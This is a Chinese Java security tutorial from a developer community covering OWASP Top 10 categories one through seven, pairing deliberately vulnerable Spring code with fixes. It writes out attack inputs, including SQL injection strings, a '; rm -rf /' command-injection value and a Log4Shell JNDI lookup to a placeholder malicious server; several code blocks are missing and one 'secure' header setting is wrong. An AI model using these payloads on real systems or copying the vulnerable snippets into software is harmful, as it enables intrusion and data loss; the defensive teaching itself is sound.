别让你的 Java 应用裸奔！OWASP Top10 全漏洞原理、复现与一站式防护方案-阿里云开发者社区

Java作为企业级开发的主流语言，广泛应用于金融、电商、政务等核心系统，一旦出现安全漏洞，会直接造成数据泄露、资产损失、合规处罚等严重后果。OWASP（开放式Web应用安全项目）发布的Top10榜单，是全球公认的Web应用安全风险权威指南，也是Java开发者必须掌握的安全核心知识。

一、失效的访问控制（Broken Access Control）

失效的访问控制位列OWASP Top10 2021榜首，是企业级应用最常见的安全风险。访问控制的核心是“用户不能执行超出其权限的操作”，而失效的本质是权限校验逻辑被绕过或失效，导致越权操作。

底层原理

先明确两个核心概念的边界：认证是验证“你是谁”，授权是验证“你能做什么”，访问控制属于授权环节。其失效的底层逻辑是：服务端没有对每一个受保护的接口/资源，执行基于用户身份的、不可绕过的权限校验，仅依赖前端隐藏按钮、路由拦截等客户端控制，或权限校验逻辑存在可被利用的缺陷。

常见的失效场景分为三类：

水平越权：同角色用户访问他人的私有数据，比如用户A查看用户B的订单
垂直越权：普通用户访问管理员专属功能，比如普通用户获取全量用户列表
未授权访问：直接绕过登录，访问需要权限的接口或资源

漏洞复现

1. 水平越权漏洞示例

import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.PathVariable; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RestController; @RestController @RequestMapping("/api/order") public class OrderController { private final OrderService orderService; public OrderController(OrderService orderService) { this.orderService = orderService; } // 漏洞点：仅从路径获取订单ID，未校验当前登录用户是否为订单所属人 @GetMapping("/{orderId}") public Order getOrderDetail(@PathVariable Long orderId) { return orderService.getOrderById(orderId); } }

攻击者只需修改路径中的orderId，即可遍历查询所有用户的订单数据，造成敏感信息泄露。

2. 垂直越权漏洞示例

import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RestController; import java.util.List; @RestController @RequestMapping("/api/admin") public class AdminController { private final UserService userService; public AdminController(UserService userService) { this.userService = userService; } // 漏洞点：未做任何权限校验，任何登录用户都能访问管理员接口 @GetMapping("/users") public List<User> getAllUserList() { return userService.getAllUsers(); } }

漏洞触发流程

防护方案

1. 服务端强制权限校验

所有接口必须在服务端执行权限校验，绝对不能仅依赖前端控制。修复水平越权的正确代码如下：

import org.springframework.security.core.Authentication; import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.PathVariable; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RestController; @RestController @RequestMapping("/api/order") public class OrderController { private final OrderService orderService; public OrderController(OrderService orderService) { this.orderService = orderService; } // 修复方案：从当前登录上下文获取用户ID，联合订单ID查询，确保订单归属 @GetMapping("/{orderId}") public Order getOrderDetail(@PathVariable Long orderId, Authentication authentication) { Long loginUserId = Long.valueOf(authentication.getName()); return orderService.getOrderByIdAndUserId(orderId, loginUserId); } }

对应DAO层必须使用select * from t_order where id = #{orderId} and user_id = #{userId}的查询逻辑，不能仅通过订单ID查询。

2. 基于RBAC的统一权限控制

使用Spring Security等成熟安全框架，实现基于角色的访问控制（RBAC），从框架层面统一管理接口权限，避免人为疏漏。Spring Security 6的标准配置如下：

import org.springframework.context.annotation.Bean; import org.springframework.context.annotation.Configuration; import org.springframework.security.config.annotation.web.builders.HttpSecurity; import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity; import org.springframework.security.config.http.SessionCreationPolicy; import org.springframework.security.web.SecurityFilterChain; @Configuration @EnableWebSecurity public class SecurityConfig { @Bean public SecurityFilterChain securityFilterChain(HttpSecurity http) throws Exception { http .authorizeHttpRequests(auth -> auth .requestMatchers("/api/auth/**").permitAll() .requestMatchers("/api/admin/**").hasRole("ADMIN") .anyRequest().authenticated() ) .sessionManagement(session -> session .sessionCreationPolicy(SessionCreationPolicy.STATELESS) ) .csrf(csrf -> csrf.disable()); return http.build(); } }

3. 核心防护原则

最小权限原则：仅给用户分配完成业务所需的最小权限，默认拒绝所有访问，仅开放必要接口
禁止路径穿越：文件下载、静态资源访问接口，必须限制访问范围，禁止直接拼接用户传入的路径参数
统一权限校验：避免每个接口单独编写权限校验逻辑，使用框架层面的统一拦截器或AOP实现

二、加密机制失效（Cryptographic Failures）

加密机制失效位列OWASP Top10 2021第二位，其前身是“敏感数据泄露”，更名的核心原因是：敏感数据泄露的根源，几乎都是加密机制的设计或实现存在缺陷。

底层原理

加密机制失效的本质是：应用在处理敏感数据（密码、手机号、身份证、银行卡等）的全生命周期（传输、存储、使用、销毁）中，没有遵循密码学最佳实践，使用了不安全的算法、弱密钥、错误的加密模式，或未对敏感数据做分类分级保护，导致敏感数据被明文暴露、破解或篡改。

漏洞复现

1. 不安全的密码存储示例

2. 不安全的对称加密示例

import javax.crypto.Cipher; import javax.crypto.spec.SecretKeySpec; import java.util.Base64; public class InsecureAESUtil { // 漏洞点1：硬编码密钥在代码中，代码泄露直接导致密钥暴露 private static final String FIXED_KEY = "1234567890123456"; // 漏洞点2：使用ECB模式，不提供语义安全性，相同明文加密结果一致，易被破解 private static final String ALGORITHM = "AES/ECB/PKCS5Padding"; public static String encrypt(String content) throws Exception { SecretKeySpec keySpec = new SecretKeySpec(FIXED_KEY.getBytes(), "AES"); Cipher cipher = Cipher.getInstance(ALGORITHM); cipher.init(Cipher.ENCRYPT_MODE, keySpec); byte[] encrypted = cipher.doFinal(content.getBytes()); return Base64.getEncoder().encodeToString(encrypted); } public static String decrypt(String encryptedContent) throws Exception { SecretKeySpec keySpec = new SecretKeySpec(FIXED_KEY.getBytes(), "AES"); Cipher cipher = Cipher.getInstance(ALGORITHM); cipher.init(Cipher.DECRYPT_MODE, keySpec); byte[] decrypted = cipher.doFinal(Base64.getDecoder().decode(encryptedContent)); return new String(decrypted); } }

防护方案

1. 密码存储的正确实践

密码属于不可逆敏感数据，绝对不能明文存储，也不能使用MD5、SHA-1、SHA-256等快速哈希算法，必须使用BCrypt、SCrypt、Argon2等专为密码存储设计的慢哈希算法，这类算法自带随机盐值，计算速度慢，能有效抵御彩虹表和暴力破解。

Spring Security标准密码加密配置：

import org.springframework.context.annotation.Bean; import org.springframework.context.annotation.Configuration; import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder; import org.springframework.security.crypto.password.PasswordEncoder; @Configuration public class PasswordConfig { // 工作因子设为12，可根据服务器性能调整，数值越大破解难度越高 @Bean public PasswordEncoder passwordEncoder() { return new BCryptPasswordEncoder(12); } }

正确的密码处理代码：

import org.springframework.security.crypto.password.PasswordEncoder; import org.springframework.web.bind.annotation.PostMapping; import org.springframework.web.bind.annotation.RequestBody; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RestController; @RestController @RequestMapping("/api/auth") public class AuthController { private final UserService userService; private final PasswordEncoder passwordEncoder; public AuthController(UserService userService, PasswordEncoder passwordEncoder) { this.userService = userService; this.passwordEncoder = passwordEncoder; } @PostMapping("/register") public String register(@RequestBody UserRegisterDTO dto) { User user = new User(); user.setUsername(dto.getUsername()); // BCrypt自带随机盐值，每次加密相同密码生成的哈希值均不同 user.setPassword(passwordEncoder.encode(dto.getPassword())); userService.save(user); return "注册成功"; } @PostMapping("/login") public String login(@RequestBody UserLoginDTO dto) { User user = userService.findByUsername(dto.getUsername()); if (user == null) { return "用户名或密码错误"; } // 无需手动解密，使用matches方法自动校验密码 if (!passwordEncoder.matches(dto.getPassword(), user.getPassword())) { return "用户名或密码错误"; } return "登录成功"; } }

2. 对称加密的正确实践

对于需要解密还原的敏感数据（如手机号、身份证号），必须使用AES-GCM认证加密模式，该模式同时提供加密和完整性校验能力，密钥长度至少256位，密钥必须从配置中心或密钥管理服务（KMS）获取，绝对不能硬编码。

安全的AES-GCM工具类：

import javax.crypto.Cipher; import javax.crypto.KeyGenerator; import javax.crypto.SecretKey; import javax.crypto.spec.GCMParameterSpec; import javax.crypto.spec.SecretKeySpec; import java.security.SecureRandom; import java.util.Base64; public class SecureAESUtil { private static final String ALGORITHM = "AES/GCM/NoPadding"; private static final int KEY_SIZE = 256; private static final int GCM_IV_LENGTH = 12; private static final int GCM_TAG_LENGTH = 128; private final SecretKey secretKey; // 密钥从配置中心/KMS获取，禁止硬编码 public SecureAESUtil(String base64Key) { byte[] keyBytes = Base64.getDecoder().decode(base64Key); this.secretKey = new SecretKeySpec(keyBytes, "AES"); } // 生成256位安全密钥，仅用于初始化密钥时使用 public static String generateAESKey() throws Exception { KeyGenerator keyGenerator = KeyGenerator.getInstance("AES"); keyGenerator.init(KEY_SIZE, SecureRandom.getInstanceStrong()); SecretKey secretKey = keyGenerator.generateKey(); return Base64.getEncoder().encodeToString(secretKey.getEncoded()); } public String encrypt(String content) throws Exception { byte[] contentBytes = content.getBytes(); // 生成12字节随机IV，GCM标准推荐长度 byte[] iv = new byte[GCM_IV_LENGTH]; SecureRandom secureRandom = SecureRandom.getInstanceStrong(); secureRandom.nextBytes(iv); GCMParameterSpec parameterSpec = new GCMParameterSpec(GCM_TAG_LENGTH, iv); Cipher cipher = Cipher.getInstance(ALGORITHM); cipher.init(Cipher.ENCRYPT_MODE, secretKey, parameterSpec); byte[] encrypted = cipher.doFinal(contentBytes); // IV无需保密，和密文拼接存储，解密时使用 byte[] combined = new byte[iv.length + encrypted.length]; System.arraycopy(iv, 0, combined, 0, iv.length); System.arraycopy(encrypted, 0, combined, iv.length, encrypted.length); return Base64.getEncoder().encodeToString(combined); } public String decrypt(String encryptedContent) throws Exception { byte[] combined = Base64.getDecoder().decode(encryptedContent); // 提取前12字节IV byte[] iv = new byte[GCM_IV_LENGTH]; System.arraycopy(combined, 0, iv, 0, iv.length); // 提取加密内容 byte[] encrypted = new byte[combined.length - iv.length]; System.arraycopy(combined, iv.length, encrypted, 0, encrypted.length); GCMParameterSpec parameterSpec = new GCMParameterSpec(GCM_TAG_LENGTH, iv); Cipher cipher = Cipher.getInstance(ALGORITHM); cipher.init(Cipher.DECRYPT_MODE, secretKey, parameterSpec); byte[] decrypted = cipher.doFinal(encrypted); return new String(decrypted); } }

3. 核心防护原则

敏感数据分类分级：非必要不采集、不存储敏感数据，对不同级别的敏感数据采用差异化保护策略
传输层加密：全站启用HTTPS，使用TLS 1.3协议，禁用TLS 1.0/1.1等不安全协议
敏感数据脱敏：日志、接口返回、前端展示时，对敏感数据做脱敏处理，示例如下：

public class SensitiveDataUtil { // 手机号脱敏：保留前3位和后4位 public static String maskPhone(String phone) { if (phone == null || phone.length() != 11) return phone; return phone.replaceAll("(\\d{3})\\d{4}(\\d{4})", "$1****$2"); } // 身份证号脱敏：保留前6位和后4位 public static String maskIdCard(String idCard) { if (idCard == null || idCard.length() != 18) return idCard; return idCard.replaceAll("(\\d{6})\\d{8}(\\d{4})", "$1********$2"); } }

禁用不安全算法：JVM层面禁用MD5、SHA-1、DES、3DES、RC4等已被破解的算法

三、注入攻击（Injection）

注入攻击位列OWASP Top10 2021第三位，最常见的类型为SQL注入，同时包含命令注入、EL表达式注入、OGNL注入等多种形式，是历史最悠久、危害最严重的安全漏洞之一。

底层原理

注入攻击的核心本质是数据和指令没有分离，应用将用户可控的输入未经校验和转义，直接拼接到命令或查询语句中，作为指令的一部分执行，导致攻击者可以构造恶意输入，改变原有语句的执行逻辑，执行非授权操作。

漏洞复现

1. SQL注入漏洞示例

最基础的Statement拼接SQL场景：

攻击者输入' OR '1'='1，拼接后的SQL变为SELECT id, username, phone FROM t_user WHERE username = '' OR '1'='1'，会查询出全量用户数据，造成脱库；输入'; DROP TABLE t_user; --可直接删除数据表。

MyBatis中错误使用${}的场景：

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE mapper PUBLIC "-//mybatis.org//DTD Mapper 3.0//EN" "http://mybatis.org/dtd/mybatis-3-mapper.dtd"> <mapper namespace="com.example.mapper.UserMapper">  <select id="getUserByUsername" resultType="com.example.entity.User"> SELECT id, username, phone FROM t_user WHERE username = ${username} </select>  <select id="getUserListOrderBy" resultType="com.example.entity.User"> SELECT id, username, phone FROM t_user ORDER BY ${orderBy} ${sortType} </select> </mapper>

2. 命令注入漏洞示例

攻击者输入127.0.0.1; rm -rf /，会执行ping -c 4 127.0.0.1; rm -rf /，删除服务器所有文件，造成毁灭性后果。

漏洞触发与防护流程

防护方案

1. SQL注入的核心防护

使用预编译语句是SQL注入最根本的防护方案，预编译会将SQL语句的结构和参数完全分离，用户输入的参数只会被当作数据处理，不会改变SQL语句的结构。

正确的PreparedStatement示例：

MyBatis的正确使用规范：

优先使用#{}，#{}会采用预编译处理，自动转义特殊字符，从根源上避免SQL注入
必须使用${}的场景（如排序字段、表名），必须做严格的白名单校验，仅允许预设的合法值

正确的Mapper.xml与配套校验代码：

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE mapper PUBLIC "-//mybatis.org//DTD Mapper 3.0//EN" "http://mybatis.org/dtd/mybatis-3-mapper.dtd"> <mapper namespace="com.example.mapper.UserMapper"> <select id="getUserByUsername" resultType="com.example.entity.User"> SELECT id, username, phone FROM t_user WHERE username = #{username} </select> <select id="getUserListOrderBy" resultType="com.example.entity.User"> SELECT id, username, phone FROM t_user ORDER BY ${orderBy} ${sortType} </select> </mapper>

import org.springframework.stereotype.Service; import java.util.Arrays; import java.util.List; @Service public class UserService { private final UserMapper userMapper; // 排序字段白名单 private static final List<String> ALLOWED_ORDER_FIELDS = Arrays.asList("id", "username", "create_time"); // 排序类型白名单 private static final List<String> ALLOWED_SORT_TYPES = Arrays.asList("ASC", "DESC"); public UserService(UserMapper userMapper) { this.userMapper = userMapper; } public List<User> getUserListOrderBy(String orderBy, String sortType) { // 白名单校验，非法参数直接抛出异常 if (!ALLOWED_ORDER_FIELDS.contains(orderBy)) { throw new IllegalArgumentException("非法的排序字段"); } if (!ALLOWED_SORT_TYPES.contains(sortType.toUpperCase())) { throw new IllegalArgumentException("非法的排序类型"); } return userMapper.getUserListOrderBy(orderBy, sortType); } }

2. 命令注入的核心防护

优先使用Java API替代系统命令，如ping操作可使用InetAddress.isReachable()实现，无需执行系统命令
必须执行系统命令时，使用ProcessBuilder将命令和参数完全分离，避免shell解析
对用户输入做严格的白名单校验，仅允许合法字符，禁止出现分号、&、|等特殊字符

正确的命令执行示例：

3. 核心防护原则

永远不要信任用户输入，所有用户可控的参数都必须做校验和处理
输入校验采用白名单原则，仅允许合法的字符和格式，拒绝所有非法输入
数据库账号遵循最小权限原则，仅给业务必需的权限，禁止给DROP、ALTER等高危权限

四、不安全的设计（Insecure Design）

不安全的设计是OWASP Top10 2021新增的核心类别，位列第四，也是很多开发者最容易忽略的风险。它与代码实现缺陷不同，指的是应用在设计阶段就存在根本性的安全缺陷，即使代码写得再规范，也无法避免安全问题。

底层原理

不安全的设计的核心本质是：安全是设计出来的，不是后期补出来的。应用在需求分析、架构设计、业务流程设计阶段，没有融入安全思维，缺少安全设计模式、威胁建模和必要的安全控制，导致应用天生就存在安全缺陷，后期的代码实现无法弥补根本性的设计漏洞。

常见的不安全设计场景：

业务流程设计缺陷，如密码找回流程可被绕过，攻击者可重置任意用户密码
缺少防暴力破解、防重放攻击的设计
敏感操作没有二次身份校验
信任前端传入的核心参数，服务端未做重新校验
未做威胁建模，未识别业务中的核心安全风险

漏洞复现

最常见的密码找回流程设计缺陷：

import org.springframework.web.bind.annotation.PostMapping; import org.springframework.web.bind.annotation.RequestBody; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RestController; import javax.servlet.http.HttpSession; @RestController @RequestMapping("/api/auth") public class PasswordResetController { private final UserService userService; private final SmsService smsService; public PasswordResetController(UserService userService, SmsService smsService) { this.userService = userService; this.smsService = smsService; } @PostMapping("/send-reset-code") public String sendResetCode(@RequestBody SendCodeDTO dto, HttpSession session) { String phone = dto.getPhone(); String code = smsService.generateCode(); smsService.sendSms(phone, "您的密码重置验证码是：" + code); session.setAttribute("reset_code_" + phone, code); return "验证码发送成功"; } // 核心设计缺陷： // 1. 未校验手机号与验证码的归属，攻击者可用自己的验证码修改他人密码 // 2. 验证码使用后未失效，可重复使用 // 3. 无有效期、发送频率限制，可暴力枚举 @PostMapping("/reset-password") public String resetPassword(@RequestBody ResetPasswordDTO dto, HttpSession session) { String phone = dto.getPhone(); String inputCode = dto.getCode(); String newPassword = dto.getNewPassword(); String correctCode = (String) session.getAttribute("reset_code_" + phone); if (correctCode == null || !correctCode.equals(inputCode)) { return "验证码错误"; } User user = userService.findByPhone(phone); if (user == null) { return "用户不存在"; } user.setPassword(newPassword); userService.save(user); return "密码重置成功"; } }

安全的业务流程设计

防护方案

1. 安全的密码找回流程实现

import org.springframework.data.redis.core.RedisTemplate; import org.springframework.security.crypto.password.PasswordEncoder; import org.springframework.web.bind.annotation.PostMapping; import org.springframework.web.bind.annotation.RequestBody; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RestController; import java.util.concurrent.TimeUnit; @RestController @RequestMapping("/api/auth") public class PasswordResetController { private final UserService userService; private final SmsService smsService; private final RedisTemplate<String, String> redisTemplate; private final PasswordEncoder passwordEncoder; private static final String RESET_CODE_PREFIX = "reset_code:"; private static final long CODE_EXPIRE_MINUTES = 5; private static final String SEND_LIMIT_PREFIX = "send_limit:"; private static final long SEND_INTERVAL_SECONDS = 60; private static final int MAX_SEND_COUNT_PER_HOUR = 5; private static final String SEND_COUNT_PREFIX = "send_count:"; public PasswordResetController(UserService userService, SmsService smsService, RedisTemplate<String, String> redisTemplate, PasswordEncoder passwordEncoder) { this.userService = userService; this.smsService = smsService; this.redisTemplate = redisTemplate; this.passwordEncoder = passwordEncoder; } @PostMapping("/send-reset-code") public String sendResetCode(@RequestBody SendCodeDTO dto) { String phone = dto.getPhone(); // 1. 校验手机号是否注册 User user = userService.findByPhone(phone); if (user == null) { return "该手机号未注册"; } // 2. 校验发送频率，1分钟内仅可发送1次 String intervalKey = SEND_LIMIT_PREFIX + phone; if (Boolean.TRUE.equals(redisTemplate.hasKey(intervalKey))) { return "验证码发送太频繁，请稍后再试"; } // 3. 校验1小时内发送次数，最多5次 String countKey = SEND_COUNT_PREFIX + phone; Long count = redisTemplate.opsForValue().increment(countKey); if (count == 1) { redisTemplate.expire(countKey, 1, TimeUnit.HOURS); } if (count > MAX_SEND_COUNT_PER_HOUR) { return "该手机号今日获取验证码次数已达上限，请24小时后再试"; } // 4. 生成6位数字验证码 String code = smsService.generate6DigitCode(); // 5. 存储验证码到Redis，设置5分钟有效期 String codeKey = RESET_CODE_PREFIX + phone; redisTemplate.opsForValue().set(codeKey, code, CODE_EXPIRE_MINUTES, TimeUnit.MINUTES); // 6. 设置发送频率限制 redisTemplate.opsForValue().set(intervalKey, "1", SEND_INTERVAL_SECONDS, TimeUnit.SECONDS); // 7. 发送短信 smsService.sendSms(phone, "您的密码重置验证码是：" + code + "，有效期5分钟，请勿泄露给他人"); return "验证码发送成功"; } @PostMapping("/reset-password") public String resetPassword(@RequestBody ResetPasswordDTO dto) { String phone = dto.getPhone(); String inputCode = dto.getCode(); String newPassword = dto.getNewPassword(); // 1. 校验参数合法性 if (phone == null || inputCode == null || newPassword == null) { return "参数不完整"; } // 2. 从Redis获取正确的验证码 String codeKey = RESET_CODE_PREFIX + phone; String correctCode = redisTemplate.opsForValue().get(codeKey); if (correctCode == null) { return "验证码已过期，请重新获取"; } // 3. 校验验证码是否正确 if (!correctCode.equals(inputCode)) { return "验证码错误"; } // 4. 校验通过后立即删除验证码，确保仅可使用一次 redisTemplate.delete(codeKey); // 5. 校验用户是否存在 User user = userService.findByPhone(phone); if (user == null) { return "用户不存在"; } // 6. 校验密码复杂度 if (!checkPasswordComplexity(newPassword)) { return "密码复杂度不符合要求，需包含大小写字母、数字和特殊字符，长度至少8位"; } // 7. 加密新密码并更新 user.setPassword(passwordEncoder.encode(newPassword)); userService.save(user); // 8. 注销该用户所有登录token，强制重新登录 userService.logoutAllDevices(user.getId()); // 9. 发送密码修改通知 smsService.sendSms(phone, "您的账号密码已成功修改，如非本人操作，请立即联系客服"); return "密码重置成功，请使用新密码登录"; } private boolean checkPasswordComplexity(String password) { if (password.length() < 8) return false; boolean hasUpper = false, hasLower = false, hasDigit = false, hasSpecial = false; for (char c : password.toCharArray()) { if (Character.isUpperCase(c)) hasUpper = true; else if (Character.isLowerCase(c)) hasLower = true; else if (Character.isDigit(c)) hasDigit = true; else hasSpecial = true; } return hasUpper && hasLower && hasDigit && hasSpecial; } }

2. 核心防护原则

安全左移：在需求分析、设计阶段就融入安全思维，开展威胁建模，识别业务中的安全风险
核心敏感操作二次校验：转账、修改密码、注销账号等敏感操作，必须做二次身份校验
防暴力破解设计：登录、验证码等接口必须做频率限制、账号锁定、验证码机制
防重放攻击设计：核心接口必须设计幂等性机制，使用唯一订单号、nonce+时间戳确保请求仅可执行一次
最小权限原则：架构设计、业务设计中，始终遵循最小权限原则，仅开放必要的功能和权限

五、安全配置错误（Security Misconfiguration）

安全配置错误位列OWASP Top10 2021第五位，是最普遍的安全风险，超过80%的应用都存在不同程度的安全配置错误。

底层原理

安全配置错误的本质是：应用、服务器、数据库、中间件、框架等全链路的配置不符合安全要求，使用了不安全的默认配置，或缺少必要的安全配置，导致应用暴露在安全风险中。安全是一个全链路的体系，任何一个环节的配置错误，都可能导致整个安全防线被突破。

常见的安全配置错误场景：

使用默认账号和密码，如Tomcat管理账号、数据库默认root密码
对外暴露Spring Boot Actuator敏感端点、Swagger文档等内部资源
跨域配置错误，设置Access-Control-Allow-Origin: *允许所有域名跨域访问
错误页面返回完整堆栈信息，泄露应用路径、框架版本等敏感信息
未配置HTTP安全响应头，导致XSS、点击劫持等攻击
云服务存储桶设置为公开访问，导致敏感数据泄露

漏洞复现

1. Spring Boot Actuator端点对外暴露

management: endpoints: web: exposure: include: "*" # 暴露所有Actuator端点 endpoint: env: enabled: true heapdump: enabled: true

/env端点会泄露数据库密码、密钥等所有配置信息，/heapdump端点可下载应用堆内存快照，攻击者可从中提取所有敏感信息。

2. 不安全的跨域配置

import org.springframework.context.annotation.Configuration; import org.springframework.web.servlet.config.annotation.CorsRegistry; import org.springframework.web.servlet.config.annotation.WebMvcConfigurer; @Configuration public class CorsConfig implements WebMvcConfigurer { @Override public void addCorsMappings(CorsRegistry registry) { registry.addMapping("/**") .allowedOriginPatterns("*") // 允许所有域名 .allowedMethods("*") // 允许所有HTTP方法 .allowCredentials(true) // 允许携带Cookie .maxAge(3600); } }

该配置允许所有域名携带Cookie跨域访问，攻击者可在恶意网站构造跨域请求，获取用户登录后的敏感数据，执行CSRF攻击。

防护方案

1. 最小化配置原则

关闭所有不必要的功能、端口、端点，仅保留业务必需的能力。Spring Boot Actuator的安全配置示例：

management: endpoints: web: exposure: include: health # 仅暴露健康检查端点 endpoint: health: show-details: never # 对外仅返回up/down状态，不展示详细信息 server: port: 8081 # 单独设置Actuator端口，与业务端口分离，仅对内网开放

2. 安全的跨域配置

严格限制允许跨域的域名，绝对禁止使用*，仅允许业务需要的域名：

import org.springframework.context.annotation.Configuration; import org.springframework.web.servlet.config.annotation.CorsRegistry; import org.springframework.web.servlet.config.annotation.WebMvcConfigurer; @Configuration public class CorsConfig implements WebMvcConfigurer { private static final String[] ALLOWED_ORIGINS = { "https://www.example.com", "https://admin.example.com" }; @Override public void addCorsMappings(CorsRegistry registry) { registry.addMapping("/**") .allowedOriginPatterns(ALLOWED_ORIGINS) // 仅允许白名单内的域名 .allowedMethods("GET", "POST", "PUT", "DELETE") // 仅允许业务必需的HTTP方法 .allowedHeaders("*") .allowCredentials(true) .maxAge(3600); } }

3. 关闭错误页面的详细堆栈信息

生产环境禁止返回详细异常信息，仅返回通用错误提示，配置如下：

server: error: include-stacktrace: never # 生产环境永远不返回堆栈信息

同时使用全局异常处理器统一处理异常：

import org.springframework.http.HttpStatus; import org.springframework.http.ResponseEntity; import org.springframework.web.bind.annotation.ExceptionHandler; import org.springframework.web.bind.annotation.RestControllerAdvice; import org.slf4j.Logger; import org.slf4j.LoggerFactory; @RestControllerAdvice public class GlobalExceptionHandler { private static final Logger logger = LoggerFactory.getLogger(GlobalExceptionHandler.class); @ExceptionHandler(Exception.class) public ResponseEntity<Result> handleException(Exception e) { // 详细异常信息仅打印在日志中，不返回给前端 logger.error("系统异常", e); Result result = new Result(); result.setCode(500); result.setMsg("系统内部错误，请稍后再试"); return new ResponseEntity<>(result, HttpStatus.INTERNAL_SERVER_ERROR); } @ExceptionHandler(BusinessException.class) public ResponseEntity<Result> handleBusinessException(BusinessException e) { logger.error("业务异常", e); Result result = new Result(); result.setCode(e.getCode()); result.setMsg(e.getMsg()); return new ResponseEntity<>(result, HttpStatus.OK); } }

4. 配置HTTP安全响应头

使用Spring Security配置安全响应头，防止XSS、点击劫持、MIME类型嗅探等攻击：

import org.springframework.context.annotation.Bean; import org.springframework.context.annotation.Configuration; import org.springframework.security.config.annotation.web.builders.HttpSecurity; import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity; import org.springframework.security.web.SecurityFilterChain; @Configuration @EnableWebSecurity public class SecurityConfig { @Bean public SecurityFilterChain securityFilterChain(HttpSecurity http) throws Exception { http .authorizeHttpRequests(auth -> auth .requestMatchers("/api/auth/**").permitAll() .anyRequest().authenticated() ) .headers(headers -> headers .frameOptions(frame -> frame.deny()) // 禁止页面被嵌入iframe，防止点击劫持 .contentTypeOptions(content -> content.disable()) // 禁用MIME类型嗅探 .xssProtection(xss -> xss.block()) // 开启XSS防护 .contentSecurityPolicy(csp -> csp.policyDirectives("default-src 'self'")) // 内容安全策略 ) .csrf(csrf -> csrf.disable()); return http.build(); } }

5. 核心防护原则

建立标准化的安全配置基线，所有环境必须遵循统一的安全配置规范
禁用所有默认账号和默认配置，修改所有默认密码，使用强密码
定期使用自动化工具扫描配置错误，如Nessus、OpenVAS等
开发、测试、生产环境严格隔离，生产环境敏感信息必须加密存储，禁止硬编码

六、自带缺陷和过时的组件（Vulnerable and Outdated Components）

自带缺陷和过时的组件位列OWASP Top10 2021第六位，是企业被攻击的重灾区，Log4j2 JNDI注入、Spring4Shell、Fastjson反序列化等知名高危漏洞，都属于该类别。

底层原理

该风险的核心本质是：应用的安全强度，取决于整个依赖链中最薄弱的环节。即使自身代码写得再安全，依赖的第三方组件、框架、中间件存在已知的安全漏洞，或已经停止维护，攻击者可以利用这些已知漏洞，轻易攻破应用。

常见的风险场景：

使用存在已知高危漏洞的组件，如低版本的Log4j2、Fastjson、Spring Cloud Gateway
使用已经停止维护的过时组件，如Log4j 1.x、commons-beanutils 1.x
未清理未使用的依赖，通过传递依赖引入有漏洞的组件
未定期更新组件版本，使用的版本过低，存在大量已知漏洞

漏洞复现

Log4j2 JNDI注入漏洞（CVE-2021-44228），影响版本为2.0-beta9到2.14.1：

<dependencies>  <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-core</artifactId> <version>2.14.1</version> </dependency> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-api</artifactId> <version>2.14.1</version> </dependency> </dependencies>

import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RequestParam; import org.springframework.web.bind.annotation.RestController; @RestController @RequestMapping("/api") public class LogController { private static final Logger logger = LogManager.getLogger(LogController.class); // 漏洞点：用户输入的内容直接被Log4j2解析，触发JNDI注入 @GetMapping("/log") public String log(@RequestParam String content) { logger.info("用户输入的内容：{}", content); return "日志打印成功"; } }

攻击者只需访问http://localhost:8080/api/log?content=${jndi:ldap://恶意服务器/恶意类}，即可触发漏洞，执行任意代码，控制服务器。

防护方案

建立依赖白名单，仅使用经过安全验证、活跃维护的官方组件，禁止使用已停止维护的组件
定期更新组件到最新的稳定版本，及时修复已知的安全漏洞
清理未使用的依赖和功能，减少依赖数量，缩小攻击面
使用自动化工具定期扫描依赖漏洞，如OWASP Dependency-Check、Snyk、Dependabot等
处理传递依赖的漏洞，使用<exclusions>排除有漏洞的传递依赖，或指定安全的版本覆盖
使用<dependencyManagement>锁定所有依赖的版本，避免传递依赖引入有漏洞的版本
建立高危漏洞应急响应流程，当出现新的高危组件漏洞时，可快速评估影响、修复漏洞

七、身份认证和授权失效（Identification and Authentication Failures）

身份认证和授权失效位列OWASP Top10 2021第七位，是应用安全的第一道防线，一旦该环节失效，整个安全体系就会完全崩溃。

底层原理

该风险的核心本质是：应用在用户身份认证、会话管理环节存在缺陷，导致攻击者可以冒充合法用户，绕过身份认证，获取用户的权限，执行非授权操作。与失效的访问控制不同，该风险聚焦于“你是谁”的身份认证环节，而访问控制聚焦于“你能做什么”的授权环节。

常见的风险场景：

允许弱密码、默认密码，无密码复杂度要求
无防暴力破解机制，登录接口无次数限制、无验证码
会话管理缺陷，Session ID未过期、退出登录后未失效
JWT token无过期时间、无吊销机制、使用弱密钥签名
多因素认证缺失，核心系统无二次身份校验
凭证明文传输、明文存储，导致身份信息泄露

漏洞复现

不安全的JWT实现：

import io.jsonwebtoken.Jwts; import io.jsonwebtoken.SignatureAlgorithm; import java.util.Date; public class InsecureJWTUtil { // 漏洞点1：使用弱密钥，易被暴力破解 private static final String SECRET_KEY = "123456"; // 漏洞点2：未设置token过期时间，token永久有效 public static String generateToken(Long userId) { return Jwts.builder() .setSubject(userId.toString()) .signWith(SignatureAlgorithm.HS256, SECRET_KEY) .compact(); } // 漏洞点3：未校验token签名，攻击者可伪造任意token public static Long getUserIdFromToken(String token) { try { return Long.valueOf(Jwts.parser() .parseClaimsJws(token) .getBody() .getSubject()); } catch (Exception e) { return null; } } }

防护方案

1. 安全的JWT实现

